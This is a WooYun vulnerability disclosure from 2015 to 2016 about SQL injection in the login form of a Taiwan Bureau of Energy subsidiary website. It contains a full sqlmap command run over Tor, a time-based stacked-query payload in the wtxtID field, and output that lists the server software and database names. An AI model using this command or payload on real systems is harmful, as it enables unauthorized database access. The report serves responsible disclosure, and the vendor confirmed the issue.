
Vulnerability summary

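Bug ID: wooyun-2015-0164365

Title: SQL injection in a website subordinate to the Taiwan Bureau of Energy (Taiwan region)

Vendor: Taiwan Bureau of Energy (台湾能源局)

Author: 路人甲

Submitted: 2015-12-28 16:50

Fixed: 2016-02-12 18:49

Disclosed: 2016-02-12 18:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: Handed over to a third-party partner organization (Hitcon, the Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org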



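Vulnerability details

Disclosure status:

2015-12-28: Details reported to the vendor; awaiting vendor handling
2015-12-30: Vendor confirmed; details disclosed to the vendor only
2016-01-09: Details disclosed to core white hats and experts in related fields
2016-01-19: Details disclosed to regular white hats
2016-01-29: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public

Brief description:

SQL injection in a website subordinate to the Taiwan Bureau of Energy

Detailed description:

SQL injection in a website subordinate to the Taiwan Bureau of Energy

Proof of vulnerability: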

$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N --answers="extending=N,skip=Y,follow=N,quite=Y" -u "http://**.**.**.**/ecem_asso/" --data="__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTQwNTQzMTk4MA9kFgICAw9kFgYCBQ8QZGQWAWZkAgkPEA8WAh4HVmlzaWJsZWhkZBYBZmQCDw8PZBYCHgdvbmNsaWNrBTBpZiAoISBkb1N1Ym1pdF9mcm1FSU1TTG9naW4oKSApIHsgcmV0dXJuIGZhbHNlO31kZALxmJ1YEFq4ivnUluJI1nUJrL75d3qwcYqyZscxDHIp&__VIEWSTATEGENERATOR=6E1E6603&__EVENTVALIDATION=%2FwEdAB8kaUtvws8kuBYkiJrbC%2BesFq29negq3mFOYTR8%2BP4sFTjhKKHG2qB%2BY3b%2F8oYsoWLtp%2Fq7o0m9FwzaEv5l1JtJK040%2FqUXLXKzoT80wjcF9Y3u%2BAJmPgphVLZT7HLCdIm3Ksf7tj7DvOUdnd6fBQQC45Tl%2BiojsHBTvMKGfsKZsJEKG5y%2BAFtkZSp%2B3QCkDest7MC%2FTgmrTYIipoRtPxxtB%2F4uQrMGpJash3cgN6yZBp1dKqBCNHLdsimx%2Bz7g74ytqCtQuD01aSHJ%2Fnxvzwf7a576RE1p6cVH%2FWXAQGs2jxYvD7Qn6Ja1%2BdHEwjrcqgqNERGAi%2BNI%2FwTj0aYXsMUu4mgoVbgFFQNR%2BpKoDk16hNoxF%2BBihsROkNr5LB5sSR6LBAa0ngbr5fex4dUdMmhbJ%2FgdCCW%2B7DJkGNELFCvkSzF4AOndOF2NDl10RA2Prpm1Y%2FefEHqaqawbtB4Tpo9%2FLkqBTcsvJUaHreQ7YGYdY4QOPrM%2BVVhYPNmth5fVm3BQqdjCf%2BVXNT%2FEZ48lxSYemnUahPp24FK6dtoPMNqk6omAuZEtt0CFpueXC6bs4UaEqfUo8mOBjC3EOJUIh8fZvEfHoYPOiZ9lKvSuy0LNaPxOv8PS1Ci7hkfQYwhz%2B50cJKkGLgf49a0tat20Lfpof9vGMsSB3IwqFbCofXtH3hcP0QEONvxTat9Ca67s5YQ%3D&hidCasekind=A&CASE_KIND=A&DpLstUSER=313310100K&wtxtID=1111&wtxtPW=1111&wbtnLogin=%E7%99%BB%E5%85%A5%E7%B3%BB%E7%B5%B1" --dbs
---
Parameter: wtxtID (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTQwNTQzMTk4MA9kFgICAw9kFggCBQ8QZGQWAWZkAgkPEA8WAh4HVmlzaWJsZWhkZBYBZmQCDw8PZBYCHgdvbmNsaWNrBTBpZiAoISBkb1N1Ym1pdF9mcm1FSU1TTG9naW4oKSApIHsgcmV0dXJuIGZhbHNlO31kAhEPDxYEHgRUZXh0BSfluLPomZ/miJblr4bnorzmnInoqqQs6KuL6YeN5paw6Ly45YWlISEfAGdkZGRMdKi5vKHKmaBvWMuidPzU0GBkoX583TjOQDdomZjKdw==&__VIEWSTATEGENERATOR=6E1E6603&__EVENTVALIDATION=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&hidCasekind=A&CASE_KIND=A&DpLstUSER=313310100K&wtxtID=1111';WAITFOR DELAY '0:0:20'--&wtxtPW=1111&wbtnLogin=%E7%99%BB%E5%85%A5%E7%B3%BB%E7%B5%B1
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
available databases [6]:
[*] EBDB
[*] master
[*] model
[*] msdb
[*] OGDB
[*] tempdb

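Fix:

Filtering

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-12-30 17:48

Vendor reply:

Thank you for the report

Latest status:

None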